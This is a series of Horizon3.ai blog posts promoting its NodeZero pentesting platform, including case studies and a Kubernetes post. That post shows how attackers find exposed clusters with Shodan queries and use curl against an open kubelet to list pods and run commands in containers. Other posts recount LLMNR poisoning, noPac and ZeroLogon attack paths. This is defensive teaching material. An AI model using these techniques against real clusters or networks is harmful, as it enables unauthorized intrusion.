
New PyPi Malware Steals Discord And Roblox Credential & Payment Info: Sync

19 August 2022 at 14:26

The IT Nerd: 08/19/22

Obviously, Roblox and Discord need to do more to protect the majority of young users on their platforms. Most concerns center on the platform’s procedures to protect user privacy, in which many Discorders find their data being collected by anonymous APIs. 

Read the entire article here

The post New PyPi Malware Steals Discord And Roblox Credential & Payment Info: Sync appeared first on Horizon3.ai.

Horizon3.ai Wins Most Promising Early-Stage Startup in 2022 SC Awards

22 August 2022 at 13:14

Businesswire: 08/22/22

Horizon3.ai announced that it has been recognized as an Excellence Award winner in the Most Promising Early-Stage Startup category for the 2022 SC Awards. Now in its 25th year, the industry awards program is cybersecurity’s most prestigious and competitive program, recognizing the solutions, organizations, and people driving innovation and success in information security.

Read the entire article here

The post Horizon3.ai Wins Most Promising Early-Stage Startup in 2022 SC Awards appeared first on Horizon3.ai.

Most Promising Early-Stage Start Up | Horizon3.ai

22 August 2022 at 13:16

SC Media: 08/22/22

Horizon3.ai has developed NodeZero, an autonomous penetration testing platform that continuously assesses an enterprise’s attack surface, identifying ways an attacker could chain together harvested credentials, misconfigurations, dangerous product defaults, and exploitable vulnerabilities to compromise systems and data.

Read the entire article here

The post Most Promising Early-Stage Start Up | Horizon3.ai appeared first on Horizon3.ai.

Who wins: Characteristics of a promising startup

22 August 2022 at 17:19

SC Media: 08/22/22

Despite a tumultuous market, cybersecurity companies continue to draw millions in venture dollars. So how can startups and investors alike best leverage the relationship? As part of the SC Awards Winners Circle video series, SC Media dug into this dynamic with Dave DeWalt, founder and managing director of NightDragon, recipient of our Best Growth-Stage Investor Of The Year award; Ofer Schreiber, senior partner and head of the Israeli office at YL Ventures, recipient of Early-Stage Investor Of The Year award; and Monti Knode, director of customer success at Horizon3.ai, recipient of the Most Promising Early-Stage Startup award.

Read the entire article here

The post Who wins: Characteristics of a promising startup appeared first on Horizon3.ai.

NodeZero: Filling a Unique Niche in Cybersecurity

23 August 2022 at 16:18

When the IT and cybersecurity team of a U.S.-based management consulting organization was searching for ways to improve its penetration testing, NodeZero and Horizon3.ai were able to answer the call.

“We’d done some penetration testing in the past, and it was quite expensive,” says the organization’s infrastructure manager. “We were looking to do this on a more regular cadence and looking at different solutions we could implement.”

After running into a team member from Horizon3.ai, they shared a rundown of what they were looking for and felt that NodeZero might be just what the situation called for.

“I liked the ease of implementation and use of the product,” he says. “And the ability to just do constant scanning and fixes without having to pay for every instance was the biggest appeal.”

The organization’s director of IT noted that there were solutions he’d encountered that could do external pentesting, but what they really needed at this stage was powerful internal pentesting capabilities.

“Looking at vulnerabilities and criticality was key for us,” he says. “And the biggest thing for me was having a full-package pentest, with all the functionality you needed to really look for and tackle vulnerabilities accordingly.”

The struggle to keep up

The organization’s biggest struggle at the time was simply being able to keep up with a small team – they didn’t have a dedicated team member to keep up with alerts and investigations.

“We wanted to be able to identify vulnerabilities ahead of time and keep ahead of the game,” says their infrastructure manager. “In the past, when we were doing scans, we were able to identify issues – fortunately none required significant time to fix – but being able to identify those things and act on them before they can be exploited is huge for us with a small team.”

“In looking at and enforcing our security strategy, we’re trying to implement controls – and with NodeZero, we’re able to implement the right controls and software we need to better our environment,” says their director of IT.

This also helps with various compliance requirements, a key component of the security team’s mission, as well as uncovering any major vulnerabilities in the environment.

More frequent testing

The team wanted to be able to go in and do internal ops more often, something NodeZero makes uniquely possible.

“Being able to perform on-demand scans is really great – we can scan, make adjustments, and then run another scan to verify we’ve been successful,” says their infrastructure manager.

“We’re taking security to a higher level within the organization to obtain certifications in compliance, and this is going to help with that a lot,” says their director of IT.

Cost effectiveness and efficiency

One of the strongest draws to NodeZero was the ability to run those repeated pentest operations anytime and anywhere they needed them – without incurring additional costs.

“It’s just much more cost effective and easier to deal with the licensing,” says their infrastructure manager.

Being able to run those operations for internal pentesting set it apart from other options on the market, says their director of IT.

“It’s one thing attacking an organization from the outside, but when attacking from the inside, you need to understand it and have the capabilities to do it,” he says. “I feel NodeZero has the capacity to do that.”

Getting up and running with NodeZero was quick and easy rather than adding cycles to a team that was already running lean.

“Setting up a scan is relatively quick and painless to do,” says their infrastructure manager.

“And even the reports are very intuitive – what the report surfaces and what we need to do to mitigate that,” says their director of IT.

It’s also enabled a frequency of testing they wanted, rather than being limited by the time and cost of standard penetration tests. Before NodeZero, the organization conducted pentests once or twice a year. They already plan to increase this to quarterly, or more – maximizing their return on investment.

NodeZero enables customers to turn a small team into a seasoned, veteran one.

“It takes a lot of the work our team would have to go through to conduct these investigations, finds vulnerabilities and tells us what needs to happen, and even ranks those vulnerabilities and tells us why something should be considered more urgent than others,” says their infrastructure manager. “It helps prioritize work for optimal impact and address those issues that are going to be critical to our environment soonest.”

“NodeZero, I think, fills a huge missing niche. Not just the skill set or background of company but the actual product, enabling you to do internal and external vulnerability testing to mitigate the issues most people are facing,” says their director of IT.

If you’d like to see how NodeZero works with your organization, have our experts walk you through a demo.

Download the PDF version

The post NodeZero: Filling a Unique Niche in Cybersecurity appeared first on Horizon3.ai.

Beyond Password Issues: How NodeZero Found Access to an Organization’s Azure Cloud Environment  

25 August 2022 at 19:24

NodeZero is a generational leap beyond a traditional pentest – organizations often see that for themselves from the moment they give our autonomous pentesting platform a shot. NodeZero surfaces risks and weaknesses that would never have come up during a general vulnerability scan, because it chains together attack tactics and techniques to illuminate the most critical impacts an attacker could generate in your environment.

Take for example a recent NodeZero operation run by an organization in the wholesale distribution sector. What at first appeared to be minor “password issues” led to a high-risk attack path enabling NodeZero to access the domain admin accounts, and even break into the organization’s Azure cloud environment. 

From here, NodeZero could pivot and impact day-to-day operations, such as compromising their business email, but more to follow on that below. 

To start, NodeZero performed a host discovery and found weaknesses through the LLMNR (Link-Local Multicast Name Resolution) protocol, poisoning a host and capturing an unverified credential. (LLMNR is a service used by Windows to resolve hostnames to IP addresses when a DNS request fails in a network.) 

The first thing NodeZero did at that point was to try to crack the hash, which it did in under five minutes. 

NodeZero shows obfuscated usernames and passwords as proof that it was able to obtain them, and destroys those records after every pentest. In this case, “when we see a capital P at the beginning and an exclamation point at the end, that doesn’t bode well,” says Monti Knode, Director of Customer Success with Horizon3.ai. As you likely already know, that pattern usually means a default or extremely common password.

Making matters worse, this was a privileged account.

Now that NodeZero had the name and password, it attempted to log in to the domain – and in this case, it was able to do so as a Domain Administrator, immediately leading to a compromise of this domain controller with full read/write permissions.

An attack graph demonstrating how NodeZero obtained access to the customer’s Azure Cloud.

Domain compromise not once but twice

A business email compromise enabled NodeZero to take a regular user’s credentials – found while trying to log into the domain – and leverage that to find other credentials. It then could find a domain user, impersonate them, and gain additional control over a second domain admin.

With this second credential, NodeZero elevated a regular user with no rights to domain admin by taking advantage of the noPac vulnerability. A little background: in mid-December 2021, noPac, a public exploit that combined two Microsoft Active Directory design flaws, was released; it allowed a regular domain user to escalate privileges to domain admin, which then enabled malicious actors to launch multiple attacks, including domain takeovers or ransomware attacks.

“That’s why this vulnerability is at the top of the weakness list,” says Knode. “If we were to recommend one thing to fix in this case, it would be that noPac vulnerability.” 

NodeZero offers a Fix Action linking to the knowledge base information the organization needs to get those domain controllers patched and protected.

NodeZero offers context for the vulnerability, the related credentials and impacts, and the knowledge needed to fix the issue and keep it fixed, so the organization has the education and tools to stay patched in the future.

The impact component is vitally important, as by offering context scoring, the customer can see why a weakness that leads to critical impacts in a network gets prioritized to the top of the list of recommended fixes. 

The customer can even rerun a “1-click Verify” pentest on just those hosts where there is a known weakness. “Something like this should be a fairly easy one to do, and we highly recommend it – follow our Fix Actions for those noPac vulnerabilities, select the 1-click Verify option to follow up, and then rerun this more surgical operation as soon as you get the chance,” says Knode. 

Business email compromise

NodeZero was also able to execute a business email compromise, chaining an attack from the previously successful LLMNR poisoning technique. In this case, NodeZero found that this user also had an account in the company’s Azure tenant and, from the domain user, was able to pivot for further access. Multi-factor authentication (MFA) was not activated, so NodeZero was able to gain access to their Azure cloud environment and then get into Outlook.

With this valid domain account, NodeZero accessed 25 business emails, and as proof, NodeZero showed the customer the subject lines of the emails it was able to access.

“NodeZero took advantage of the Active Directory login because MFA was disabled on Azure,” says Knode. 

With MFA turned off, NodeZero reused the newly captured credential against the cloud login, and the issue’s criticality score rose to 9.9. Implementing multi-factor authentication is recommended across network zones and data access points, and turning MFA “on” for cloud access in particular was strongly recommended, as it limits an attacker’s ability to take advantage of the Azure service.

Some of these paths can get complicated, but there are Fix Actions the customer can move forward with.

“They have password and credential policy problems, but there were some really high priority fixes they could remediate and see immediate risk reduction,” says Knode. “You don’t have to fix everything. You can fix what matters most, and then verify the fix by running a pentest and aligning it to the scope to see immediately if the fix worked.” 

What are you using, and does it work? 

One question that comes up time and time again in IT is: are the solutions I’ve already paid for effective? 

The NodeZero customer success team asks an organization if they received any alerts about this vulnerability. Was it detected, logged, alerted to, and was it stopped? 

In these instances, this did not happen. 

When NodeZero was able to dump these credentials, an EDR should absolutely have issued an alert and their antivirus solution should have stopped it. 

“We recommend looking into this,” says Knode. “We’re transparent with every action NodeZero takes, so you can go through and see. Export the report and take a look.” 

We recommended this organization go back and check their logs to see if the incident was detected and logged, and if it wasn’t, ask how someone was able to dump credentials and why it wasn’t logged, alerted on, or stopped.

“Nobody should be able to do this without setting off a trigger and an alert,” says Knode. 

From there Horizon3.ai went through the ops, helped plan a strategy, and looked at next steps. Customers can also take the information NodeZero provides in its reporting features to take the steps on their own. 

“We’re not trying to ‘pwn’ organizations, we’re not trying to poke them in the face and make them look bad – we want to make sure their security stack is putting out every ounce of protection they want from it,” says Knode. 

Want to see NodeZero in action for yourself? Schedule a demo today. 

The post Beyond Password Issues: How NodeZero Found Access to an Organization’s Azure Cloud Environment   appeared first on Horizon3.ai.

An International Look at Cybercrime

29 August 2022 at 15:19

Authoritarian regimes have learned in recent years that cybercrime can be a profitable economic enterprise – so much so that they continue to invest substantial resources in large- and small-scale cybercrime. This lucrative work goes on to fund their governments and their lavish lifestyles, among other things.

These nefarious nation state actors – North Korea, Iran, Russia, and China – all steal large sums of money by targeting Western infrastructure, private and public organizations, and sometimes even outspoken entities that speak openly against each of them. Furthermore, these nation state actors have long seen the West as an existential threat on the global stage for a multitude of reasons, especially in the realms of economy, infrastructure, intelligence and military affairs.

Economically, the battle between communist and capitalist agendas rages on, with stiff competition between Eastern and Western technology, energy, manufacturing, and more. For example, China uses its global Belt and Road Initiative (BRI), under the guise of helping struggling economies, to gain influence and essentially create debt traps for unsuspecting countries. Meanwhile, maritime power has reemerged as a vehicle for control and for asserting dominance over disputed territories (China’s ambitions for Taiwan and for controlling parts of the Pacific, so far an icy stalemate). Conflicts are also being fought on land, as seen with Russia’s invasion of Ukraine and Iran’s continued tensions with Israel and the U.S. over its nuclear agenda.

The Link Between Cybersecurity and Geopolitics

With this gradual increase in global cyber competition, it is no wonder that nation states continue to invest in cyber infrastructure and predominantly fight in the cyber world. Many are correct to believe that cybersecurity and geopolitics are directly linked. If anything, businesses have learned this lesson the hard way. Being a private-sector, multinational organization does not make a company immune to an enemy nation’s ransomware and cyberattacks. Worse, a private business operating abroad can become a target for spyware (consider China’s BRI and the cyber giant Huawei) on the suspicion that it is harboring its home country’s government secrets and holds “the keys to the castle.”

Overall, despite a nation state’s obvious agenda of zeroing in on military and government targets, such adversaries have become bolder and less hesitant about attacking private businesses, regardless of that company’s commitment to serving consumers internationally. For example, many have recently blamed Russia for attacks on American companies as big as Microsoft, Apple, and Cisco, as well as for the SolarWinds fiasco in 2020.

As Dangerous as the Wild West

Due to such actions, the cyber world is now as dangerous as the Wild West. The question is, how are businesses and everyday citizens supposed to live while being caught in the chaotic influx of criminalistic and outlaw-ish rivalry?

The answer is: They do not. Cybersecurity has become a constant in daily life, and enemy nation states are part of the reason why. Every day, another business is on the news because it has been hacked by foreign threat actors who, with sophisticated and unsophisticated techniques, manage to destroy the finances, ambitions, and public reputation of a once-respected economic contributor.

Looking back 10 years, it would have been hard to believe that extraordinary measures (such as firewalls, multi-factor authentication, intrusion detection and prevention systems, etc.) would now need to be implemented to defend against malicious advanced persistent threats (APTs). However, doing business today means realizing that nobody is safe. It no longer matters what industry an organization belongs to or what product it peddles.

Unfortunately, businesses across the globe are not safe from APTs, regardless of industry, sector or affiliation. APT tactics, techniques and procedures (TTPs) continue to advance, and so should business TTPs for protecting against threats.

Therefore, every private institution needs to align its policies with “security first” thinking. While most businesses have IT departments, many still lack a well-trained and sophisticated cybersecurity team within their organization. Changes toward a more secure network and security structure need to be made, along with recruiting the people who can do the job effectively (not just a one-person team). If companies fail to get started before it is too late, most of the world will find itself at the mercy of cyber outlaws and APTs.

This post was authored by the Cyber Threat Analyst Team: Al Martinek, Corey Sinclair and Taylor Ellis.

The post An International Look at Cybercrime appeared first on Horizon3.ai.

Healthcare Staffing Organization Puts Cybersecurity Best Practices in Place with NodeZero

31 August 2022 at 15:29

The director of security engineering at a national healthcare staffing organization grew up wanting to be a hacker, and he found that NodeZero’s ability to provide the attacker’s perspective to help better protect his organization was a perfect fit for keeping his organization safe.

“Security has always been on my mind. Protecting company assets has always been on my mind. We’d reached a point where our organization is big enough, people are working remotely, and I wanted to split off some of my roles and be ultimately dedicated to security,” he says.

One of the challenges he has faced over the years has been convincing the C-suite to focus on security. They always had compliance in mind and policies in place, but the organization struggled with aging software that had no development cycle, or whose vendors no longer supported it once it aged out or broke down.

As a publicly traded company, they ran their annual penetration tests on their roughly 900-1,200 hosts and performed well – they had a strong firewall in place protecting them from outside threats.

“But we have ancient software inside, and one of the great things about NodeZero is that it’s internally focused. In my mind, that’s where the threats will come from,” he says.

The first time he ran NodeZero, it was able to obtain domain admin access in 17 minutes via an overlooked machine that shared a password with other machines. It also surfaced risks and vulnerabilities in those aging internal machines and systems that might otherwise have been hard to find.

“We have folks, who have come and gone, who may have built servers I’m not aware of, that we don’t know about until NodeZero finds them, finds the misconfigurations, and helps us remediate them,” he says.

Immediate, Actionable Results

Before NodeZero, the organization would run one external pentest and one scan to check on their remediation actions.

The pentest would, regardless of vendor, use the same tools.

“You get a PDF telling your execs how you suck, and 99 percent of the stuff that says you suck are things that are such low priority you don’t care about them,” he says. “I love that with NodeZero, those are identified as low-priority, such as expired SSL certs, very minor things.”

Because other options all felt cookie cutter, with no difference in quality, leadership simply wanted the cheapest, easiest option to check that box. Cost was always a struggle – with security being seen as an annoying expense – until a key leader, who had survived a ransomware attack at his previous organization and now had security top of mind, rejoined the company.

“He asked, what are you missing? I told him endpoint protection, and we had the contract signed the next day,” he says.

When it came time for addressing pentesting, there was some pushback between the dev and infrastructure teams, but once they ran a demo of NodeZero, the teams fell in line.

“I showed the demo to our network guy, who’s as big a cynic as I am, and he was blown away, saying ‘this is what we need,’” he says.

This was all happening right around the time the Log4Shell vulnerability was the talk of the cybersecurity world.

“Log4j was everywhere,” he says, but running NodeZero offered actionable mitigation right away, whereas other tools they were using at the time had a lag time of weeks.

From Once a Year to Once a Month

The organization now runs NodeZero once a month, and then retests mid-month. With NodeZero they’re able to show progress better than ever before.

“Audit and compliance guys would look at the number of vulnerabilities in a 90-day period and say the numbers have gone up, you haven’t fixed anything,” he says. “But we’re able to show them that these are new weaknesses, and that new vulnerabilities come up all the time. We’re not being measured against those 90 days, and we can compare in the middle of the month to see what’s been fixed.”

In fact, with NodeZero running, the only issues his team has not fixed are due to manpower, not because of testing.

“Honestly, anything that hasn’t been addressed is a resource issue on our side,” he explained.

NodeZero has also helped them get better results from other tools and resources. They were able to cut attack notification time from their MSSP from four hours to fifteen minutes, and they validated their endpoint protection by verifying that the pentests are immediately detected and alerts issued – all enabling them to get more out of existing expenditures.

NodeZero has improved their overall accuracy, for example by identifying a recurring false positive for Adobe Flash, which was no longer being used but could not be removed from some older machines.

Doing Things Other Vendors Don’t

“I don’t think you have any other competitors,” he says. “I’d have to go out and get a red team to do what NodeZero does, and it would cost twice as much for one scan.”

He also appreciates that NodeZero doesn’t just stop when it finds a vulnerability – it keeps digging. “It chains attacks, which other pentesters don’t do,” he says. “Hackers don’t say hey, I got access to this, I’ll stop here. That’s not how they operate.”

As a once-aspiring hacker himself, their director of security engineering knows that anyone who says they are 100% secure is either dishonest or naïve.

“You are going to get breached. It’s going to happen,” he says. “But the more you understand, the better you can lock things down and limit the blast radius.”

If you’d like to see how NodeZero works with your organization, have our experts walk you through a demo.

Download the PDF version

The post Healthcare Staffing Organization Puts Cybersecurity Best Practices in Place with NodeZero appeared first on Horizon3.ai.

Are Your Kubernetes Clusters Configured Properly?

31 August 2022 at 18:16

TL;DR: Given recent news about misconfigured Kubernetes clusters, it’s a great time to review best practices for ensuring the security configurations for your own Kubernetes network. Read on to learn more.

Researchers recently discovered some 900,000 Kubernetes clusters that were potentially exposed to malicious scans and data theft during a threat-hunting exercise. The vast majority of those clusters responded with 401 Unauthorized or 403 Forbidden errors, and while that’s better than being completely exposed, it doesn’t mean that they’re necessarily configured properly. Any time a number like that hits the headlines, cybersecurity professionals can feel that familiar twist in their stomach: please don’t let that number include me.   

Let’s take a look at a Kubernetes environment through the eyes of an attacker. First, it’s important to understand that Kubernetes uses HTTP and HTTPS APIs for communication between its various components. The APIs are well documented and transparent, meaning the APIs we’ll be using are the same ones the Kubernetes components use. There are no hidden APIs used behind the scenes, which makes enumerating and interacting with Kubernetes fairly straightforward.

Our generalized attack flow will be: identify IPs hosting possible Kubernetes components, enumerate against default Kubernetes ports, determine the version of Kubernetes running, check the cluster for vulnerabilities or misconfigurations and finally exploit the vulnerabilities.   

As mentioned in the above article, identifying Kubernetes clusters can be done with online scanners like Shodan.io. A few default Shodan queries include: 

  • title:"Kubernetes Dashboard"
  • product:kubernetes
  • Kubernetes

For a more targeted attack, an IP address, GET requests and knowledge of the Kubernetes API are all you need. The responses to GET requests can indicate whether or not Kubernetes is running on a given port. For the rest of this article, we’ll be using a cluster set up in our development lab and deliberately misconfigured. We’ll use ‘curl’ to send a GET request to the default Kubernetes API server port (6443) and check the response. Initially we get a ‘403 Forbidden’ error. The message “forbidden: User \"system:anonymous\" cannot get path” is a hint that the request was blocked by Kubernetes Role-Based Access Control (RBAC): ‘system:anonymous’ is the built-in identity Kubernetes assigns to any request made without an authenticated user or service account.

A GET request to the default Kubernetes API server port (6443) to check the response.

Let’s make the same request but this time ask ‘curl’ to display the response headers as well using the ‘-i‘ flag. 

An additional request, asking ‘curl’ to display the response headers as well, using the ‘-I’ flag.

While we still get the same 403 Forbidden response back, there are two headers that stand out in the response: ‘x-kubernetes-pf-flowschema-uid’ and ‘x-kubernetes-pf-prioritylevel-uid’. These headers are included in responses from default Kubernetes deployments. An additional method to identify a cluster is to inspect the Subject Alternative Name (SAN) in the SSL certificate being used. If the certificate is a self-signed certificate generated by Kubernetes during its deployment, you’ll see something similar to the following: “DNS:kubernetes, DNS:kubernetes.default, DNS:kubernetes.default.svc, DNS:kubernetes.default.svc.cluster.local”.  

Now that we, the attackers, have identified a Kubernetes cluster, we’ll again use ‘curl’ to see if we can determine the version of Kubernetes that is deployed. There are two API resources we’ll check. The first is the API server running on port 6443 and the other is the kubelet, which by default runs on port 10250 (HTTPS). First we’ll check the API server to see if it leaks the version information.

Checking the API server to see if it leaks the version information.

Looking at the output, we see the major, minor, and gitVersion listed. This tells us that we’re running Kubernetes 1.24.3. Now let’s try the kubelet component to see if we can get it to respond. If it responds, there’ll be a flood of information. We can narrow down the output to the version information by using ‘grep’.  

Narrowing down the output to the version information using ‘grep’.

Here again we see the git_version in the output with the value of “v1.24.3”. Why is the version information important to an attacker? Well, the Kubernetes APIs are ever evolving and improving as new features are added and old APIs are deprecated. This means that the Kubernetes components are sensitive to version skew. Attackers can use the Kubernetes command-line tool, kubectl, to interact with a vulnerable cluster. They’ll want to make sure that the version of kubectl they are using matches with the major and minor version of the cluster they are attacking as this will eliminate any issues they may encounter due to changed APIs.  

Getting a response from the kubelet indicates that it is misconfigured. The kubelet is a Kubernetes component that runs on each node as the primary “node agent.” It communicates with the API server and is responsible for ensuring the containers on that node are running and healthy. A kubelet with open access means an attacker may have the ability to read information about the pods on a node or read the logs of the containers. Worse yet, the attackers may be able to run arbitrary commands inside of the existing containers or to start containers of their own. 

Using ‘curl’ we can get a list of pods on the node. We’ll use ‘jq’ to clean up the output and extract only the pod names. 

Using ‘jq’ to clean up the output and extract only pod names.

Taking this a step further, let’s see if we can run a command inside one of the containers. We’ll keep it simple and see if we can run an ‘ls -al’. In addition to the pod name, we’ll need the namespace and container name we want to run the command in. We can of course get all that information from the kubelet and in fact we’ll use the same command we just used with just a small tweak to the ‘jq’ output. 

Testing to see if a command can be run inside one of the containers.

Now with all the information we need, we can attempt to run a command in the calico-node-8krgh pod. This time instead of a GET request, we’ll use ‘curl’ to send a POST to the /run API with the namespace, pod, and container as parameters and the command we want to run as the body of the request. 

Using ‘curl’ to send a POST to the /run API with the namespace, pod, and container as parameters and the command we want to run as the body of the request.

At this point, the attackers have free rein within this pod and container to do what they like. The next step would be a container escape and full compromise of the host running the cluster. 
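Two defender-side checks for the kubelet weakness walked through above, as an added example that is not Horizon3.ai’s or NodeZero’s code: an audit of the kubelet’s own configuration for the settings that let anonymous callers in, and a parser that shows exactly what an open kubelet’s /pods endpoint hands out (the namespace, pod and container triples the /run request needs). It assumes the kubelet config is supplied as a dict (the JSON form of a KubeletConfiguration) and that the /pods document is the JSON the kubelet serves on port 10250; every sample value below is constructed.

```python
# Added example (not Horizon3.ai's or NodeZero's code): two defender-side
# checks for the kubelet weakness walked through above. Assumptions: the
# kubelet config is a dict (the JSON form of a KubeletConfiguration), the
# /pods document is the JSON the kubelet serves on port 10250, and every
# sample value below is constructed.
import json

_MISSING = object()


def _lookup(cfg, *path):
    """Walk nested dict keys; return _MISSING when any key is absent."""
    node = cfg
    for key in path:
        if not isinstance(node, dict) or key not in node:
            return _MISSING
        node = node[key]
    return node


def audit_kubelet_config(cfg):
    """Return findings for settings that let anonymous callers reach the
    kubelet API. Keys that are absent are reported rather than guessed,
    because the effective default depends on how the kubelet is launched."""
    checks = [
        (("authentication", "anonymous", "enabled"), lambda v: v is True,
         "authentication.anonymous.enabled=true: unauthenticated requests are accepted"),
        (("authentication", "webhook", "enabled"), lambda v: v is False,
         "authentication.webhook.enabled=false: bearer tokens are never checked with the API server"),
        (("authorization", "mode"), lambda v: v == "AlwaysAllow",
         "authorization.mode=AlwaysAllow: any request that gets past authentication is allowed"),
        (("readOnlyPort",), lambda v: v != 0,
         "readOnlyPort is non-zero: /pods is also served with no authentication at all"),
    ]
    findings = []
    for path, is_weak, message in checks:
        value = _lookup(cfg, *path)
        if value is _MISSING:
            findings.append(".".join(path) + " not set explicitly: confirm the effective default")
        elif is_weak(value):
            findings.append(message)
    return findings


def exposed_containers(pods_doc):
    """Return (namespace, pod, container) triples from a kubelet /pods
    response: the three values an anonymous caller needs for the /run
    request described above, i.e. what an open kubelet leaks."""
    triples = []
    for item in pods_doc.get("items", []):
        meta = item["metadata"]
        for container in item["spec"].get("containers", []):
            triples.append((meta["namespace"], meta["name"], container["name"]))
    return triples


# Constructed configs: the weak one reproduces the misconfiguration from the
# walkthrough, the hardened one uses the values kubeadm-provisioned clusters
# commonly set.
WEAK_CFG = {
    "apiVersion": "kubelet.config.k8s.io/v1beta1", "kind": "KubeletConfiguration",
    "authentication": {"anonymous": {"enabled": True}, "webhook": {"enabled": False}},
    "authorization": {"mode": "AlwaysAllow"},
    "readOnlyPort": 10255,
}
HARDENED_CFG = {
    "apiVersion": "kubelet.config.k8s.io/v1beta1", "kind": "KubeletConfiguration",
    "authentication": {
        "anonymous": {"enabled": False},
        "webhook": {"enabled": True},
        "x509": {"clientCAFile": "/etc/kubernetes/pki/ca.crt"},
    },
    "authorization": {"mode": "Webhook"},
    "readOnlyPort": 0,
}

# Constructed /pods excerpt using the pod name from the walkthrough;
# the container name is invented.
SAMPLE_PODS = json.loads("""
{"kind": "PodList", "items": [
  {"metadata": {"name": "calico-node-8krgh", "namespace": "kube-system"},
   "spec": {"containers": [{"name": "calico-node"}]}}
]}
""")

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CFG), ("hardened", HARDENED_CFG)):
        print(name, audit_kubelet_config(cfg) or ["no findings"])
    print(exposed_containers(SAMPLE_PODS))
```

A real audit would load the node’s kubelet config file (converted to JSON) into audit_kubelet_config and only then, from a host you own, compare what /pods returns with and without credentials.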

Improving Your Kubernetes Environment’s Security Configurations 

We’ve just demonstrated how a couple of simple misconfigurations can quickly lead to a significant compromise of your infrastructure. But that’s just one example attack path against one or two misconfigured items. With as complex as Kubernetes can get, it can be easy to misconfigure a component. So instead of resolving the specific misconfigurations one-by-one from above, here’s some overarching guidance that will help improve your overall security posture. 

First, understand and correctly apply role-based access control (RBAC) to your cluster. RBAC provides a system to restrict access and prevent subjects from making requests to resources that they don’t have access to. It consists of three primary items: the resource, the verb and the subject. The resource is the Kubernetes API resource type, like a node or a pod. The verb is the operation that can be performed on the resource, like create or list. The subject is the user, group, or service account that is making the request. Properly applied RBAC in the scenario above would have prevented all of the anonymous requests.   

Second, limit your exposed surface. The Kubernetes dashboard is a good user tool that can aid in the administration of your cluster. However, it is likely not a good idea to expose the dashboard to the internet even with the correct permissions and authentication in place. If the only people that need access to the dashboard are the infrastructure team and they only access it from your intranet, then make sure it hasn’t been accidentally exposed to the internet. There are several ways to expose a service to external users. The variety of methods and complexity of Kubernetes networking can make it non-trivial to do correctly. Don’t assume that because a service is exposed on an ephemeral high port it’s configured correctly and not accessible from external sources. 

Finally, regularly verify the security of your cluster. Kubernetes is a complex system. The more pods you deploy, the more services you expose, the more complex it gets. Your security posture today isn’t the same as it will be tomorrow. Verify your security whenever you make a change to your configuration or deployment. This can be the hardest recommendation to follow as infrastructure is constantly changing and thoroughly checking your cluster security COULD be a long and painstaking process, but it doesn’t have to be. This is where NodeZero shines! 

Verify your cluster security with NodeZero 

NodeZero runs an autonomous penetration test when you want or need to. You’ll get results quickly, and rather than a laundry list of risks, your vulnerabilities will be listed by criticality, so you can move quickly on the biggest risks right away. NodeZero will also show you how it was able to discover the vulnerabilities and it will provide proof of the exposure so you don’t have to wonder where or how you are exposed. 

We’ve significantly expanded our coverage of Kubernetes vulnerabilities and misconfigurations. NodeZero will enumerate your endpoints and determine if a Kubernetes cluster is being hosted. If it determines that there is a cluster present, it will proceed to test the cluster for exposed nodes, services and ports. As soon as NodeZero finishes, you’ll get a prioritized list of weaknesses discovered. 

Prioritized weaknesses discovered in a cluster.

NodeZero won’t just tell you that your cluster is vulnerable though. It’ll show you, both how it discovered the weakness and proof of the weakness either in the form of a screenshot or output from a command abusing the weakness. 

Path to Unauthenticated Kubernetes API Server Access.

Proof of Unauthenticated Kubernetes API Server Access.

The fact that so many Kubernetes clusters exist today, misconfigured and exposed, highlights the need for more frequent penetration testing with faster turnaround time. NodeZero finds misconfigurations and vulnerabilities so fixes can happen quickly, and those fixes can be verified just as fast.  

Run the test. Get the results. Make the fixes you need to make – and then, re-run the test to verify that your Kubernetes clusters are not at risk. Don’t wait for your annual pentest to find out you’ve still got clusters running default settings, or that your dashboard is unprotected.   

And best of all, with NodeZero, the next time you see breaking cybersecurity news that keeps you up at night, you can run a test right then and there to make sure you’re not on the list of potential victims. 

Schedule a demo today to find out if you’re vulnerable.  

Horizon3.ai’s Travis Fahlgren, Senior Engineer, and Trampas Howe, Offensive Security Expert, contributed to this report.  

The post Are Your Kubernetes Clusters Configured Properly? appeared first on Horizon3.ai.

Patched ≠ Remediated: Healthcare Faces an Aggressive Threat Landscape

12 September 2022 at 16:23

Healthcare Data Breaches Bar Chart

The Challenge: Healthcare Faces an Aggressive Threat Landscape.

One of our clients, a leading U.S. hospital and healthcare system, consistently earns high marks for clinical excellence and is among the top 10 percent in the nation for patient safety. Recognizing the growing cybersecurity threats to healthcare organizations and the importance of maintaining compliance with regulatory standards like HIPAA, PCI, and other privacy rules, the organization’s IT staff worked hard to ensure a strong security posture.

Our client’s IT team had adopted many security best practices and tools, including state-of-the-art firewalls, vulnerability scanning, endpoint detection and response (EDR), automated patch management, network segmentation, and a managed security service provider (MSSP). In addition, the team began implementing a zero-trust architecture and has tools to monitor the many specialized medical devices on its hospital networks.

Even with these comprehensive security practices in place, the team wanted to do more. Hackers have increasingly targeted the healthcare industry. In 2020, over 600 data breaches of 500 or more patient records were reported. Ransomware attacks continue to be extensively used against healthcare organizations, and these attacks are becoming more costly.

The Solution: NodeZero™ Automated Red Teaming

Liberman Networks, a managed security and IT services company, recognized that even with their many controls implemented, our client could still be vulnerable to an attack.
Liberman Networks called on Horizon3.ai to help validate our client’s defenses and provide proof of what was truly effective and which deficiencies remained.

Our client used Horizon3.ai’s NodeZero – a fully autonomous SaaS offering that views the network from the attacker’s perspective – to conduct a comprehensive penetration test across its enterprise. In a matter of minutes and with virtually no configuration, NodeZero began its reconnaissance, mapping the organization’s infrastructure and over 8,400 hosts, probing for misconfigurations, open ports, and other vulnerabilities an attacker could exploit, whether alone or by chaining multiple weaknesses.
Patched does not equal Remediated Attack Path

The Findings: Unauthenticated Access to Domain Controllers

NodeZero ran for eight days with no adverse impact to the network.

NodeZero identified 31 vulnerabilities with 278 unique attack paths, proofs for each, and remediation guidance.

The most significant and surprising finding was immediately communicated to our client by Liberman Networks – even before NodeZero completed its testing. Ten Microsoft Active Directory domain controllers were affected by ZeroLogon – a “critical” and potentially catastrophic privilege escalation vulnerability allowing unauthenticated access to devices, first disclosed a year prior to the NodeZero test. Worse, an exploit was publicly available, making the vulnerability an easy target. Had attackers targeted the vulnerable hosts they could have quickly created their own credentials and gained unfettered access to every system in the organization. The result could include stealing patient information and financial data or installing ransomware on our client’s endpoints and databases.

Patched does not equal Remediated Findings Stats

“We patched this back in February. All of our reporting shows it as patched.” — Director of Infrastructure

Lesson 1: Reporting Tools Can Lie.

